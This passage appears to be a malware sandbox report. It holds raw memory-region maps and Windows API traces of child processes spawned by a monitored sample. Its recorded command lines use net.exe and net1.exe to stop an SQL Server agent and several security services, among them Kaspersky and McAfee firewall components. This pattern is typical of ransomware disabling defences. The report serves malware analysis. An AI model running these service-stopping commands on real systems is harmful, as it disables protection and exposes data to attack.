14035 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14036 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 14037 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14057 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14058 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14059 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 14060 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14061 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14062 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14063 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14129 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14130 start_va = 0x290000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 14131 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 14132 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14133 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 14134 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14135 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14136 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14137 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14138 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14139 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14140 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 14141 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14142 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14143 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14144 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14145 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14146 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14147 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14148 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 968 os_tid = 0xea8 [0124.095] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afad0 | out: lpSystemTimeAsFileTime=0x1afad0*(dwLowDateTime=0xff1615d0, dwHighDateTime=0x1d48689)) [0124.095] GetCurrentProcessId () returned 0x1030 [0124.095] GetCurrentThreadId () returned 0xea8 [0124.095] GetTickCount () returned 0x28a54 [0124.096] QueryPerformanceCounter (in: lpPerformanceCount=0x1afad8 | out: lpPerformanceCount=0x1afad8*=1817101400000) returned 1 [0124.096] GetModuleHandleW (lpModuleName=0x0) returned 0xff260000 [0124.096] __set_app_type (_Type=0x1) [0124.096] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff279c9c) returned 0x0 [0124.097] __getmainargs (in: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788, _DoWildCard=0, _StartInfo=0xff28479c | out: _Argc=0xff284780, _Argv=0xff284790, _Env=0xff284788) returned 0 [0124.097] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.097] GetConsoleOutputCP () returned 0x1b5 [0124.097] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff28cec0 | out: lpCPInfo=0xff28cec0) returned 1 [0124.097] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.099] sprintf_s (in: _DstBuf=0x1afa78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0124.099] setlocale (category=0, locale=".437") returned="English_United States.437" [0124.100] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0124.100] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0124.100] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQLEXPRESS /y" [0124.100] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af810, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0124.100] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0124.100] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa68 | out: Buffer=0x1afa68*=0x304d60) returned 0x0 [0124.100] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa68 | out: Buffer=0x1afa68*=0x30c130) returned 0x0 [0124.101] _fileno (_File=0x7fefdba2a80) returned 0 [0124.101] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0124.101] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0124.101] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0124.101] _wcsicmp (_String1="config", _String2="stop") returned -16 [0124.101] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0124.101] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0124.101] _wcsicmp (_String1="file", _String2="stop") returned -13 [0124.101] _wcsicmp (_String1="files", _String2="stop") returned -13 [0124.101] _wcsicmp (_String1="group", _String2="stop") returned -12 [0124.101] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0124.101] _wcsicmp (_String1="help", _String2="stop") returned -11 [0124.101] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0124.101] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0124.101] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0124.101] _wcsicmp (_String1="session", _String2="stop") returned -15 [0124.101] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0124.101] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0124.101] _wcsicmp (_String1="share", _String2="stop") returned -12 [0124.101] _wcsicmp (_String1="start", _String2="stop") returned -14 [0124.101] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0124.101] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0124.101] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0124.101] _wcsicmp (_String1="accounts", _String2="SQLAgent$SQLEXPRESS") returned -18 [0124.101] _wcsicmp (_String1="computer", _String2="SQLAgent$SQLEXPRESS") returned -16 [0124.101] _wcsicmp (_String1="config", _String2="SQLAgent$SQLEXPRESS") returned -16 [0124.101] _wcsicmp (_String1="continue", _String2="SQLAgent$SQLEXPRESS") returned -16 [0124.101] _wcsicmp (_String1="cont", _String2="SQLAgent$SQLEXPRESS") returned -16 [0124.101] _wcsicmp (_String1="file", _String2="SQLAgent$SQLEXPRESS") returned -13 [0124.101] _wcsicmp (_String1="files", _String2="SQLAgent$SQLEXPRESS") returned -13 [0124.102] _wcsicmp (_String1="group", _String2="SQLAgent$SQLEXPRESS") returned -12 [0124.102] _wcsicmp (_String1="groups", _String2="SQLAgent$SQLEXPRESS") returned -12 [0124.102] _wcsicmp (_String1="help", _String2="SQLAgent$SQLEXPRESS") returned -11 [0124.102] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$SQLEXPRESS") returned -11 [0124.102] _wcsicmp (_String1="localgroup", _String2="SQLAgent$SQLEXPRESS") returned -7 [0124.102] _wcsicmp (_String1="pause", _String2="SQLAgent$SQLEXPRESS") returned -3 [0124.102] _wcsicmp (_String1="session", _String2="SQLAgent$SQLEXPRESS") returned -12 [0124.102] _wcsicmp (_String1="sessions", _String2="SQLAgent$SQLEXPRESS") returned -12 [0124.102] _wcsicmp (_String1="sess", _String2="SQLAgent$SQLEXPRESS") returned -12 [0124.102] _wcsicmp (_String1="share", _String2="SQLAgent$SQLEXPRESS") returned -9 [0124.102] _wcsicmp (_String1="start", _String2="SQLAgent$SQLEXPRESS") returned 3 [0124.102] _wcsicmp (_String1="stats", _String2="SQLAgent$SQLEXPRESS") returned 3 [0124.102] _wcsicmp (_String1="statistics", _String2="SQLAgent$SQLEXPRESS") returned 3 [0124.102] _wcsicmp (_String1="stop", _String2="SQLAgent$SQLEXPRESS") returned 3 [0124.102] _wcsicmp (_String1="time", _String2="SQLAgent$SQLEXPRESS") returned 1 [0124.102] _wcsicmp (_String1="user", _String2="SQLAgent$SQLEXPRESS") returned 2 [0124.102] _wcsicmp (_String1="users", _String2="SQLAgent$SQLEXPRESS") returned 2 [0124.102] _wcsicmp (_String1="msg", _String2="SQLAgent$SQLEXPRESS") returned -6 [0124.102] _wcsicmp (_String1="messenger", _String2="SQLAgent$SQLEXPRESS") returned -6 [0124.102] _wcsicmp (_String1="receiver", _String2="SQLAgent$SQLEXPRESS") returned -1 [0124.102] _wcsicmp (_String1="rcv", _String2="SQLAgent$SQLEXPRESS") returned -1 [0124.102] _wcsicmp (_String1="netpopup", _String2="SQLAgent$SQLEXPRESS") returned -5 [0124.102] _wcsicmp (_String1="redirector", _String2="SQLAgent$SQLEXPRESS") returned -1 [0124.102] _wcsicmp (_String1="redir", _String2="SQLAgent$SQLEXPRESS") returned -1 [0124.102] _wcsicmp (_String1="rdr", _String2="SQLAgent$SQLEXPRESS") returned -1 [0124.102] _wcsicmp (_String1="workstation", _String2="SQLAgent$SQLEXPRESS") returned 4 [0124.102] _wcsicmp (_String1="work", _String2="SQLAgent$SQLEXPRESS") returned 4 [0124.102] _wcsicmp (_String1="wksta", _String2="SQLAgent$SQLEXPRESS") returned 4 [0124.102] _wcsicmp (_String1="prdr", _String2="SQLAgent$SQLEXPRESS") returned -3 [0124.102] _wcsicmp (_String1="devrdr", _String2="SQLAgent$SQLEXPRESS") returned -15 [0124.102] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$SQLEXPRESS") returned -7 [0124.102] _wcsicmp (_String1="server", _String2="SQLAgent$SQLEXPRESS") returned -12 [0124.102] _wcsicmp (_String1="svr", _String2="SQLAgent$SQLEXPRESS") returned 5 [0124.102] _wcsicmp (_String1="srv", _String2="SQLAgent$SQLEXPRESS") returned 1 [0124.102] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$SQLEXPRESS") returned -7 [0124.102] _wcsicmp (_String1="alerter", _String2="SQLAgent$SQLEXPRESS") returned -18 [0124.102] _wcsicmp (_String1="netlogon", _String2="SQLAgent$SQLEXPRESS") returned -5 [0124.103] _wcsupr (in: _String="SQLAgent$SQLEXPRESS" | out: _String="SQLAGENT$SQLEXPRESS") returned="SQLAGENT$SQLEXPRESS" [0124.103] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x30ce40 [0124.106] GetServiceKeyNameW (in: hSCManager=0x30ce40, lpDisplayName="SQLAGENT$SQLEXPRESS", lpServiceName=0xff285750, lpcchBuffer=0x1af988 | out: lpServiceName="", lpcchBuffer=0x1af988) returned 0 [0124.107] _wcsicmp (_String1="msg", _String2="SQLAGENT$SQLEXPRESS") returned -6 [0124.107] _wcsicmp (_String1="messenger", _String2="SQLAGENT$SQLEXPRESS") returned -6 [0124.107] _wcsicmp (_String1="receiver", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0124.107] _wcsicmp (_String1="rcv", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0124.107] _wcsicmp (_String1="redirector", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0124.107] _wcsicmp (_String1="redir", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0124.107] _wcsicmp (_String1="rdr", _String2="SQLAGENT$SQLEXPRESS") returned -1 [0124.107] _wcsicmp (_String1="workstation", _String2="SQLAGENT$SQLEXPRESS") returned 4 [0124.107] _wcsicmp (_String1="work", _String2="SQLAGENT$SQLEXPRESS") returned 4 [0124.107] _wcsicmp (_String1="wksta", _String2="SQLAGENT$SQLEXPRESS") returned 4 [0124.107] _wcsicmp (_String1="prdr", _String2="SQLAGENT$SQLEXPRESS") returned -3 [0124.107] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$SQLEXPRESS") returned -15 [0124.107] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$SQLEXPRESS") returned -7 [0124.107] _wcsicmp (_String1="server", _String2="SQLAGENT$SQLEXPRESS") returned -12 [0124.107] _wcsicmp (_String1="svr", _String2="SQLAGENT$SQLEXPRESS") returned 5 [0124.107] _wcsicmp (_String1="srv", _String2="SQLAGENT$SQLEXPRESS") returned 1 [0124.107] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$SQLEXPRESS") returned -7 [0124.107] _wcsicmp (_String1="alerter", _String2="SQLAGENT$SQLEXPRESS") returned -18 [0124.107] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$SQLEXPRESS") returned -5 [0124.107] NetServiceControl (in: servername=0x0, service="SQLAGENT$SQLEXPRESS", opcode=0x0, arg=0x0, bufptr=0x1af990 | out: bufptr=0x1af990) returned 0x889 [0124.108] wcscpy_s (in: _Destination=0xff2880d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0124.108] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0124.109] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0124.110] GetFileType (hFile=0xb) returned 0x2 [0124.112] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af858 | out: lpMode=0x1af858) returned 1 [0124.112] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1af850, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x1af850*=0x1e) returned 1 [0124.112] GetFileType (hFile=0xb) returned 0x2 [0124.113] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af858 | out: lpMode=0x1af858) returned 1 [0124.113] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af850, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x1af850*=0x2) returned 1 [0124.113] _ultow (in: _Dest=0x889, _Radix=1767616 | out: _Dest=0x889) returned="2185" [0124.113] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff285b50, nSize=0x800, Arguments=0xff287f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0124.113] GetFileType (hFile=0xb) returned 0x2 [0124.114] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af858 | out: lpMode=0x1af858) returned 1 [0124.114] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff285b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1af850, lpReserved=0x0 | out: lpBuffer=0xff285b50*, lpNumberOfCharsWritten=0x1af850*=0x34) returned 1 [0124.114] GetFileType (hFile=0xb) returned 0x2 [0124.114] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1af858 | out: lpMode=0x1af858) returned 1 [0124.114] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff261efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1af850, lpReserved=0x0 | out: lpBuffer=0xff261efc*, lpNumberOfCharsWritten=0x1af850*=0x2) returned 1 [0124.115] NetApiBufferFree (Buffer=0x304d60) returned 0x0 [0124.115] NetApiBufferFree (Buffer=0x30c130) returned 0x0 [0124.115] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$SQLEXPRESS /y" [0124.115] exit (_Code=2) Process: id = "408" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6a404000" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop KAVFSGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14105 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14106 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14107 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14108 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14109 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14110 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14111 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14112 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 14113 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14114 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14115 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 14116 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14117 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14118 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14119 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 14120 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14121 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14122 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14123 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 969 os_tid = 0x1070 Process: id = "409" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7a825000" os_pid = "0xee0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop KAVFS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14149 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14150 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14151 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14152 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 14153 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14154 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14155 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14156 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 14157 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14158 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14159 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 14160 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 14161 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14162 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14163 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 14164 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14165 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14166 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14167 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 971 os_tid = 0xf28 Process: id = "410" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x24a45000" os_pid = "0x126c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop mfefire /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14195 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14196 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14197 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14198 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 14199 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" 